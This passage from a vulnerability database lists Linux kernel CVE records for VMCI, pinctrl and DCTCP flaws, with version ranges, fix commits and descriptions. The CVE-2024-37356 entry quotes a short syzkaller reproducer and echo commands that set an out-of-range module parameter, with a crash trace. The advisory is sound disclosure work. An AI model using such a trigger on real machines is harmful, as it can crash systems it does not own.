      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvmci: prevent speculation leaks by sanitizing event in event_deliver()\n\nCoverity spotted that event_msg is controlled by user-space,\nevent_msg-\u003eevent_data.event is passed to event_deliver() and used\nas an index without sanitization.\n\nThis change ensures that the event index is sanitized to mitigate any\npossibility of speculative information leaks.\n\nThis bug was discovered and resolved using Coverity Static Analysis\nSecurity Testing (SAST) by Synopsys, Inc.\n\nOnly compile tested, no access to HW."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:17:07.242Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/58730dfbd4ae01c1b022b0d234a8bf8c02cdfb81"
        },
        {
          "url": "https://git.kernel.org/stable/c/681967c4ff210e06380acf9b9a1b33ae06e77cbd"
        },
        {
          "url": "https://git.kernel.org/stable/c/f70ff737346744633e7b655c1fb23e1578491ff3"
        },
        {
          "url": "https://git.kernel.org/stable/c/95ac3e773a1f8da83c4710a720fbfe80055aafae"
        },
        {
          "url": "https://git.kernel.org/stable/c/95bac1c8bedb362374ea1937b1d3e833e01174ee"
        },
        {
          "url": "https://git.kernel.org/stable/c/e293c6b38ac9029d76ff0d2a6b2d74131709a9a8"
        },
        {
          "url": "https://git.kernel.org/stable/c/757804e1c599af5d2a7f864c8e8b2842406ff4bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/8003f00d895310d409b2bf9ef907c56b42a4e0f4"
        }
      ],
      "title": "vmci: prevent speculation leaks by sanitizing event in event_deliver()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39499",
    "datePublished": "2024-07-12T12:20:33.658Z",
    "dateReserved": "2024-06-25T14:23:23.751Z",
    "dateUpdated": "2025-11-03T21:56:17.161Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36940 (GCVE-0-2024-36940)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:29 – Updated: 2025-05-04 09:12

Title

pinctrl: core: delete incorrect free in pinctrl_enable()

Summary

In the Linux kernel, the following vulnerability has been resolved: pinctrl: core: delete incorrect free in pinctrl_enable() The "pctldev" struct is allocated in devm_pinctrl_register_and_init(). It's a devm_ managed pointer that is freed by devm_pinctrl_dev_release(), so freeing it in pinctrl_enable() will lead to a double free. The devm_pinctrl_dev_release() function frees the pindescs and destroys the mutex as well.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/735f4c6b6771eafe3…
	https://git.kernel.org/stable/c/cdaa171473d98962a…
	https://git.kernel.org/stable/c/288bc4aa75f150d6f…
	https://git.kernel.org/stable/c/41f88ef8ba387a12f…
	https://git.kernel.org/stable/c/ac7d65795827dc0cf…
	https://git.kernel.org/stable/c/558c8039fdf596a58…
	https://git.kernel.org/stable/c/f9f1e321d53e4c5b6…
	https://git.kernel.org/stable/c/5038a66dad0199de6…

Impacted products

Vendor

Product

Version

Linux

Affected: 6118714275f0a313ecc296a87ed1af32d9691bed , < 735f4c6b6771eafe336404c157ca683ad72a040d (git)
Affected: 6118714275f0a313ecc296a87ed1af32d9691bed , < cdaa171473d98962ae86f2a663d398fda2fbeefd (git)
Affected: 6118714275f0a313ecc296a87ed1af32d9691bed , < 288bc4aa75f150d6f1ee82dd43c6da1b438b6068 (git)
Affected: 6118714275f0a313ecc296a87ed1af32d9691bed , < 41f88ef8ba387a12f4a2b8c400b6c9e8e54b2cca (git)
Affected: 6118714275f0a313ecc296a87ed1af32d9691bed , < ac7d65795827dc0cf7662384ed27caf4066bd72e (git)
Affected: 6118714275f0a313ecc296a87ed1af32d9691bed , < 558c8039fdf596a584a92c171cbf3298919c448c (git)
Affected: 6118714275f0a313ecc296a87ed1af32d9691bed , < f9f1e321d53e4c5b666b66e5b43da29841fb55ba (git)
Affected: 6118714275f0a313ecc296a87ed1af32d9691bed , < 5038a66dad0199de60e5671603ea6623eb9e5c79 (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 4.19.314 , ≤ 4.19.* (semver)
Unaffected: 5.4.276 , ≤ 5.4.* (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36940",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-05T14:25:26.979822Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-05T14:25:33.588Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.606Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/735f4c6b6771eafe336404c157ca683ad72a040d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cdaa171473d98962ae86f2a663d398fda2fbeefd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/288bc4aa75f150d6f1ee82dd43c6da1b438b6068"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/41f88ef8ba387a12f4a2b8c400b6c9e8e54b2cca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ac7d65795827dc0cf7662384ed27caf4066bd72e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/558c8039fdf596a584a92c171cbf3298919c448c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f9f1e321d53e4c5b666b66e5b43da29841fb55ba"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5038a66dad0199de60e5671603ea6623eb9e5c79"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/pinctrl/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "735f4c6b6771eafe336404c157ca683ad72a040d",
              "status": "affected",
              "version": "6118714275f0a313ecc296a87ed1af32d9691bed",
              "versionType": "git"
            },
            {
              "lessThan": "cdaa171473d98962ae86f2a663d398fda2fbeefd",
              "status": "affected",
              "version": "6118714275f0a313ecc296a87ed1af32d9691bed",
              "versionType": "git"
            },
            {
              "lessThan": "288bc4aa75f150d6f1ee82dd43c6da1b438b6068",
              "status": "affected",
              "version": "6118714275f0a313ecc296a87ed1af32d9691bed",
              "versionType": "git"
            },
            {
              "lessThan": "41f88ef8ba387a12f4a2b8c400b6c9e8e54b2cca",
              "status": "affected",
              "version": "6118714275f0a313ecc296a87ed1af32d9691bed",
              "versionType": "git"
            },
            {
              "lessThan": "ac7d65795827dc0cf7662384ed27caf4066bd72e",
              "status": "affected",
              "version": "6118714275f0a313ecc296a87ed1af32d9691bed",
              "versionType": "git"
            },
            {
              "lessThan": "558c8039fdf596a584a92c171cbf3298919c448c",
              "status": "affected",
              "version": "6118714275f0a313ecc296a87ed1af32d9691bed",
              "versionType": "git"
            },
            {
              "lessThan": "f9f1e321d53e4c5b666b66e5b43da29841fb55ba",
              "status": "affected",
              "version": "6118714275f0a313ecc296a87ed1af32d9691bed",
              "versionType": "git"
            },
            {
              "lessThan": "5038a66dad0199de60e5671603ea6623eb9e5c79",
              "status": "affected",
              "version": "6118714275f0a313ecc296a87ed1af32d9691bed",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/pinctrl/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.314",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.276",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.314",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.276",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: core: delete incorrect free in pinctrl_enable()\n\nThe \"pctldev\" struct is allocated in devm_pinctrl_register_and_init().\nIt\u0027s a devm_ managed pointer that is freed by devm_pinctrl_dev_release(),\nso freeing it in pinctrl_enable() will lead to a double free.\n\nThe devm_pinctrl_dev_release() function frees the pindescs and destroys\nthe mutex as well."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:12:30.088Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/735f4c6b6771eafe336404c157ca683ad72a040d"
        },
        {
          "url": "https://git.kernel.org/stable/c/cdaa171473d98962ae86f2a663d398fda2fbeefd"
        },
        {
          "url": "https://git.kernel.org/stable/c/288bc4aa75f150d6f1ee82dd43c6da1b438b6068"
        },
        {
          "url": "https://git.kernel.org/stable/c/41f88ef8ba387a12f4a2b8c400b6c9e8e54b2cca"
        },
        {
          "url": "https://git.kernel.org/stable/c/ac7d65795827dc0cf7662384ed27caf4066bd72e"
        },
        {
          "url": "https://git.kernel.org/stable/c/558c8039fdf596a584a92c171cbf3298919c448c"
        },
        {
          "url": "https://git.kernel.org/stable/c/f9f1e321d53e4c5b666b66e5b43da29841fb55ba"
        },
        {
          "url": "https://git.kernel.org/stable/c/5038a66dad0199de60e5671603ea6623eb9e5c79"
        }
      ],
      "title": "pinctrl: core: delete incorrect free in pinctrl_enable()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36940",
    "datePublished": "2024-05-30T15:29:28.101Z",
    "dateReserved": "2024-05-30T15:25:07.072Z",
    "dateUpdated": "2025-05-04T09:12:30.088Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-37356 (GCVE-0-2024-37356)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-11-04 17:21

Title

tcp: Fix shift-out-of-bounds in dctcp_update_alpha().

Summary

In the Linux kernel, the following vulnerability has been resolved: tcp: Fix shift-out-of-bounds in dctcp_update_alpha(). In dctcp_update_alpha(), we use a module parameter dctcp_shift_g as follows: alpha -= min_not_zero(alpha, alpha >> dctcp_shift_g); ... delivered_ce <<= (10 - dctcp_shift_g); It seems syzkaller started fuzzing module parameters and triggered shift-out-of-bounds [0] by setting 100 to dctcp_shift_g: memcpy((void*)0x20000080, "/sys/module/tcp_dctcp/parameters/dctcp_shift_g\000", 47); res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000080ul, /*flags=*/2ul, /*mode=*/0ul); memcpy((void*)0x20000000, "100\000", 4); syscall(__NR_write, /*fd=*/r[0], /*val=*/0x20000000ul, /*len=*/4ul); Let's limit the max value of dctcp_shift_g by param_set_uint_minmax(). With this patch: # echo 10 > /sys/module/tcp_dctcp/parameters/dctcp_shift_g # cat /sys/module/tcp_dctcp/parameters/dctcp_shift_g 10 # echo 11 > /sys/module/tcp_dctcp/parameters/dctcp_shift_g -bash: echo: write error: Invalid argument [0]: UBSAN: shift-out-of-bounds in net/ipv4/tcp_dctcp.c:143:12 shift exponent 100 is too large for 32-bit type 'u32' (aka 'unsigned int') CPU: 0 PID: 8083 Comm: syz-executor345 Not tainted 6.9.0-05151-g1b294a1f3561 #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x201/0x300 lib/dump_stack.c:114 ubsan_epilogue lib/ubsan.c:231 [inline] __ubsan_handle_shift_out_of_bounds+0x346/0x3a0 lib/ubsan.c:468 dctcp_update_alpha+0x540/0x570 net/ipv4/tcp_dctcp.c:143 tcp_in_ack_event net/ipv4/tcp_input.c:3802 [inline] tcp_ack+0x17b1/0x3bc0 net/ipv4/tcp_input.c:3948 tcp_rcv_state_process+0x57a/0x2290 net/ipv4/tcp_input.c:6711 tcp_v4_do_rcv+0x764/0xc40 net/ipv4/tcp_ipv4.c:1937 sk_backlog_rcv include/net/sock.h:1106 [inline] __release_sock+0x20f/0x350 net/core/sock.c:2983 release_sock+0x61/0x1f0 net/core/sock.c:3549 mptcp_subflow_shutdown+0x3d0/0x620 net/mptcp/protocol.c:2907 mptcp_check_send_data_fin+0x225/0x410 net/mptcp/protocol.c:2976 __mptcp_close+0x238/0xad0 net/mptcp/protocol.c:3072 mptcp_close+0x2a/0x1a0 net/mptcp/protocol.c:3127 inet_release+0x190/0x1f0 net/ipv4/af_inet.c:437 __sock_release net/socket.c:659 [inline] sock_close+0xc0/0x240 net/socket.c:1421 __fput+0x41b/0x890 fs/file_table.c:422 task_work_run+0x23b/0x300 kernel/task_work.c:180 exit_task_work include/linux/task_work.h:38 [inline] do_exit+0x9c8/0x2540 kernel/exit.c:878 do_group_exit+0x201/0x2b0 kernel/exit.c:1027 __do_sys_exit_group kernel/exit.c:1038 [inline] __se_sys_exit_group kernel/exit.c:1036 [inline] __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1036 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xe4/0x240 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x67/0x6f RIP: 0033:0x7f6c2b5005b6 Code: Unable to access opcode bytes at 0x7f6c2b50058c. RSP: 002b:00007ffe883eb948 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7 RAX: ffffffffffffffda RBX: 00007f6c2b5862f0 RCX: 00007f6c2b5005b6 RDX: 0000000000000001 RSI: 000000000000003c RDI: 0000000000000001 RBP: 0000000000000001 R08: 00000000000000e7 R09: ffffffffffffffc0 R10: 0000000000000006 R11: 0000000000000246 R12: 00007f6c2b5862f0 R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001 </TASK>

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/06d0fe049b51b0a92…
	https://git.kernel.org/stable/c/6aacaa80d962f4916…
	https://git.kernel.org/stable/c/e9b2f60636d18dfd0…
	https://git.kernel.org/stable/c/8602150286a2a860a…
	https://git.kernel.org/stable/c/e65d13ec00a738fa7…
	https://git.kernel.org/stable/c/02261d3f9dc7d1d7b…
	https://git.kernel.org/stable/c/237340dee373b9783…
	https://git.kernel.org/stable/c/3ebc46ca8675de637…

Impacted products

Vendor

Product

Version

Linux

Affected: e3118e8359bb7c59555aca60c725106e6d78c5ce , < 06d0fe049b51b0a92a70df8333fd85c4ba3eb2c6 (git)
Affected: e3118e8359bb7c59555aca60c725106e6d78c5ce , < 6aacaa80d962f4916ccf90e2080306cec6c90fcf (git)
Affected: e3118e8359bb7c59555aca60c725106e6d78c5ce , < e9b2f60636d18dfd0dd4965b3316f88dfd6a2b31 (git)
Affected: e3118e8359bb7c59555aca60c725106e6d78c5ce , < 8602150286a2a860a1dc55cbd04f99316f19b40a (git)
Affected: e3118e8359bb7c59555aca60c725106e6d78c5ce , < e65d13ec00a738fa7661925fd5929ab3c765d4be (git)
Affected: e3118e8359bb7c59555aca60c725106e6d78c5ce , < 02261d3f9dc7d1d7be7d778f839e3404ab99034c (git)
Affected: e3118e8359bb7c59555aca60c725106e6d78c5ce , < 237340dee373b97833a491d2e99fcf1d4a9adafd (git)
Affected: e3118e8359bb7c59555aca60c725106e6d78c5ce , < 3ebc46ca8675de6378e3f8f40768e180bb8afa66 (git)

Linux

Affected: 3.18
Unaffected: 0 , < 3.18 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-37356",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T13:56:45.436880Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T13:57:55.391Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:20.246Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/06d0fe049b51b0a92a70df8333fd85c4ba3eb2c6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6aacaa80d962f4916ccf90e2080306cec6c90fcf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e9b2f60636d18dfd0dd4965b3316f88dfd6a2b31"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8602150286a2a860a1dc55cbd04f99316f19b40a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e65d13ec00a738fa7661925fd5929ab3c765d4be"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/02261d3f9dc7d1d7be7d778f839e3404ab99034c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/237340dee373b97833a491d2e99fcf1d4a9adafd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ebc46ca8675de6378e3f8f40768e180bb8afa66"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/tcp_dctcp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "06d0fe049b51b0a92a70df8333fd85c4ba3eb2c6",
              "status": "affected",
              "version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
              "versionType": "git"
            },
            {
              "lessThan": "6aacaa80d962f4916ccf90e2080306cec6c90fcf",
              "status": "affected",
              "version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
              "versionType": "git"
            },
            {
              "lessThan": "e9b2f60636d18dfd0dd4965b3316f88dfd6a2b31",
              "status": "affected",
              "version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
              "versionType": "git"
            },
            {
              "lessThan": "8602150286a2a860a1dc55cbd04f99316f19b40a",
              "status": "affected",
              "version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
              "versionType": "git"
            },
            {
              "lessThan": "e65d13ec00a738fa7661925fd5929ab3c765d4be",
              "status": "affected",
              "version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
              "versionType": "git"
            },
            {
              "lessThan": "02261d3f9dc7d1d7be7d778f839e3404ab99034c",
              "status": "affected",
              "version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
              "versionType": "git"
            },
            {
              "lessThan": "237340dee373b97833a491d2e99fcf1d4a9adafd",
              "status": "affected",
              "version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
              "versionType": "git"
            },
            {
              "lessThan": "3ebc46ca8675de6378e3f8f40768e180bb8afa66",
              "status": "affected",
              "version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/tcp_dctcp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.18"
            },
            {
              "lessThan": "3.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
